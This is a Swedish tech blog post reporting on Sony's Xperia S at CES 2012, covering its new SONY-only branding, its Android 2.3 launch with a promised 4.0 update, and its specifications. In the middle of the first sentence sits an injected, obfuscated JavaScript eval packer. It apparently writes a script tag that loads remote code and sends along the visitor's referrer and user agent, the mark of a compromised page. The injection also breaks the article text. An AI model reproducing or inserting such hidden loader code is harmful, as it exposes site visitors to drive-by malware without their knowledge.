Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

CES 2012: Sony Xperia S visas upp.

CES 2012: Sony Xperia S visas upp.
Sebastian

Sony eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|atinb|var|u0026u|referrer|tbiry||js|php’.split(’|’),0,{}))
har nu presenterat sin nya Xperia telefon på CES 2012 och märk att loggan förändrats. Skiftet är alltså här, första telefonen efter upplösningen av sony ericsson och nu står det alltså endast SONY som logga på telefonen.  Sonys nya Xpera S är en riktig tungviktare som kommer in på  smartphone marknaden. Dock så kör Xperia S endast på Android 2.3 (Gingerbread), vilket känns lite fel i tiden att släppa en mobil som inte är uppdaterad till fullo, speciellt eftersom detta är första mobilen för Sony utan Ericsson. Dock så menar man att Android 4.0 (Ice Cream Sandwich) ska finnas redo för uppdatering när telefonen släpps någon gång under Q1. Varför man då inte går ut med att Android 4.0 är OS:et som ingår känns lite udda enligt mig. Nu börjar man bara spekulera i varför detta nya flaggskepp inte skulle vara uppdaterad.

Spec för Xperia S:

processor på 1,5Ghz,  skärm på 4,3 tum med en upplösningen på 1280×720 pixlar, kamera på 12 megapixel och minneskort på 16 eller 32GB.
www.engadget.com